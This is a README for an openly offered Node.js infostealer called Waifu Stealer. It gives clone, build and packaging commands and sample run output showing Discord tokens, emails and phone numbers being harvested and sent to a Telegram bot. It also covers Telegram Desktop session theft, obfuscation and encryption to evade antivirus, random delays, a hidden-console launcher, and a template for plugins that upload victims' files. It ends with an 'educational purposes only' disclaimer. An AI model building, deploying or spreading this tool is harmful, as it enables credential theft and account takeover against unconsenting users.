
🗡️🟠 Stealer with a powerful plugin system (includes Discord and Telegram plugins)

MIT License


Waifu Stealer

Stealer with a powerful plugin system (includes Discord and Telegram plugins)

Works all operating systems, see System compatibility.


  • Source is highly obfuscated using javascript-obfuscator
  • Source is encrypted using AES-256-GCM
  • Output binary is packaged to a single portable binary using pkg
  • Steal Telegram Desktop sessions (if target has a local password, you need it to unlock the session)
  • Steal Discord tokens from clients (and decrypt them) and browsers (every profiles)
  • Send data to Telegram using webhooks

Included Plugins:

Because Node.js is an interpreted language, this is very stealth. You can easily bypass AVs. I will not give advice on how to do this, though .


As this project uses Node.js, its binary need to be included. Therefore, the executable is huge (+35 MB). Trying to pack with UPX breaks the executable .

If you know a tool similar to pkg that would download the Node.js binary at runtime instead of bundling it (to generate a small binary), create a discussion!


PS C:\Users\x\waifu-stealer> node builder.js --chatId=12345678 --token=12345678:45545duuyESn3GFZfeefezfzfrehgte515tcr3EsaK65D3I --debug --no-random-delays

Replaced dynamic imports with explicit static imports
Copied entrypoint and plugins to C:\Users\x\waifu-stealer\obfuscated
Obfuscated entrypoint to C:\Users\x\waifu-stealer\obfuscated\index.js
Obfuscated plugin [discord-stealer-plugin] to C:\Users\x\waifu-stealer\obfuscated\plugins\discord-stealer-plugin\lib.js
Obfuscated plugin [telegram-stealer-plugin] to C:\Users\x\waifu-stealer\obfuscated\plugins\telegram-stealer-plugin\lib.js
Bundled entrypoint and plugins together
Encrypted bundle to C:\Users\x\waifu-stealer\obfuscated\index.js
Obfuscated the decryptor to C:\Users\x\waifu-stealer\obfuscated\index.js
Copying native modules:

PS C:\Users\x\waifu-stealer> npm run pkg-windows

> pkg-windows
> pkg --targets node18-win-x64 --compress GZip --output hello.exe obfuscated/package.json

> [email protected]
compression:  GZip

PS C:\Users\x\waifu-stealer> .\hello.exe
Welcome to Waifu Stealer!
HWID: xxxxxxxxxxxxxxxxxxxxxxx1234567890
Loading plugins...
  [discord-stealer-plugin]... OK! 
  [telegram-stealer-plugin]... OK! 

Loaded plugins: [discord-stealer-plugin], [telegram-stealer-plugin]

Let's go! 

Running plugin [discord-stealer-plugin]! 
Look in Discord Client - C:\Users\x\AppData\Roaming\discord\Local Storage\leveldb
  Found token NDExMTxxxxxxxxxxxxxxxxxx.xxxxxx.xxxxxxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Skip Discord Canary Client (not found) - C:\Users\x\AppData\Roaming\discordcanary\Local Storage\leveldb
Skip Discord PTB Client (not found) - C:\Users\x\AppData\Roaming\discordptb\Local Storage\leveldb
Skip Opera (not found) - C:\Users\x\AppData\Roaming\Opera Software\Opera Stable\Local Storage\leveldb
Skip Chrome (not found) - C:\Users\x\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Skip Epic Privacy Browser (not found) - C:\Users\x\AppData\Local\Epic Privacy Browser\User Data\Local Storage\leveldb
Look in Firefox - C:\Users\x\AppData\Roaming\Mozilla\Firefox\Profiles
  Found token NDMxNzxxxxxxxxxxxxxxxxxx.xxxxxx.xxxxxxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  Found token NDMxNzxxxxxxxxxxxxxxxxxx.xxxxxx.xxxxxxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Check Discord tokens using the API
  Checking token NDExMTxxxxxxxxxxxxxxxxxx.xxxxxx.xxxxxxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    Found user hello#1234 (id=123456789123456789, [email protected], phone=+4161234123)
  Checking token NDExMTxxxxxxxxxxxxxxxxxx.xxxxxx.xxxxxxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    Found user qwerty#9876 (id=223456789123456789, [email protected], phone=+622284129302)
  Checking token NDExMTxxxxxxxxxxxxxxxxxx.xxxxxx.xxxxxxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    Token is invalid or expired
  Checking token NDExMTxxxxxxxxxxxxxxxxxx.xxxxxx.xxxxxxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    Found user xdxdxd#4567 (id=323456789123456789, [email protected], phone=null)

[discord-stealer-plugin] sent a message via Telegram: ``NDExMTxxxxxxxxxxxxxxxxxx.xxxxxx.xxxxxxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxx`
User: `hello#1234`
ID: `123456789123456789`
Email: [email protected]
Phone: +41646211152
Email verified: true
MFA Enabled: true
Bot: false

User: `qwerty#9876`
ID: `223456789123456789`
Email: [email protected]
Phone: +6287895939302
Email verified: true
MFA Enabled: false
Bot: false

User: `xdxdxd#4567`
ID: `323456789123456789`
Email: [email protected]
Email verified: true
MFA Enabled: false
Bot: false`

Running plugin [telegram-stealer-plugin]! 
[telegram-stealer-plugin] uploaded a file via Telegram: `xxxxxxxxxxxxxxxxxxxxxxx1234567890.zip` - New Telegram Desktop session archive\!
Archive Password: `rigwild/telegram-stealer`

Every plugin finished executing! 
 Plugin [discord-stealer-plugin] was successful!
 Plugin [telegram-stealer-plugin] was successful!

System compatibility

Plugin Windows Linux / MacOS



  • Node.js v16+

If you want to use the discord-stealer plugin, you also need:


git clone https://github.com/rigwild/waifu-stealer.git
cd waifu-stealer

# Install the plugins you need (check system compatibility above)
git clone https://github.com/rigwild/discord-stealer.git plugins/discord-stealer-plugin
git clone https://github.com/rigwild/telegram-stealer.git plugins/telegram-stealer-plugin

npm install --global pkg
npm install --dev

Generate binary

  • chatId: Telegram chat ID
  • token: Telegram bot token
  • debug: Debug mode (prints more info)
  • no-random-delays: Do not wait (if not provided, the script will randomly wait between 5 and 35 seconds before running and before starting each plugin)
  • disabled-plugins: Comma-separated list of plugins to disable (i.e. discord-stealer-plugin,telegram-stealer-plugin)
# Obfuscate and encrypt the code
npm run -- build --chatId=<telegram_chat_id> --token=<telegram_token> [--no-random-delays] [--disabled-plugins=<plugin1,plugin2,...>] [--debug]
# node builder.js [...]

# Generate the binary for the target system and architecture
npm run pkg-windows
npm run pkg-linux
npm run pkg-linux-arm
npm run pkg-macos
npm run pkg-macos-arm


Run the hello.exe binary.

If you want to execute the binary by double clicking on it, hide the console window by running the provided VB script (see run_hidden_windows.vbs).

Create your own plugin

Your project's entrypoint must be called lib.js. Your project folder must be placed in the plugins directory and have its name end with -plugin.

If you have dependencies (package.json), do not forget to install them. An NPM workspace is configured for plugins, so running this in the waifu-stealer root directory should auto-resolve plugins dependencies.

npm install --dev

Your lib.js file must export a function called run, which will be awaited.

The data returned by your run function will get sent to the Telegram chat (string: sent as is, object: JSON prettified in a code block), returning is optional.

Provided functions:

  • sendMessageFn: Send a message to the Telegram chat
  • uploadFileFn: Upload a file to the Telegram chat

Example minimal plugin:

 * @typedef RunArg Waifu Stealer passed functions
 * @type {object}
 * @property {((text: string) => Promise<void>)?} sendMessageFn
 * @property {((filePath: string, filename: string, caption: string) => Promise<void>)?} uploadFileFn

 * @param {RunArg} arg0
 * @returns {Promise<string | void>}
async function run({ sendMessageFn, uploadFileFn }) {
  // Your code here
  console.log('Hello World!')
  await sendMessageFn('Hello World Telegram!')
  await uploadFileFn(`C:\\Windows\\regedit.exe`, `regedit.exe`, 'hey, this is a regedit.exe')
  return 'This string will be printed to the Telegram chat too'

module.exports = { run }

Note: Do not use ESM as pkg does not support it.


This is for educational purposes only, to understand how malwares work.

Do not use it maliciously or on any machines that you do not have the permission for(). Be gentle, my dear, and don't hurt anyone.

I am not responsible for any harm you do with this shit, bruh, let me breath.

The MIT license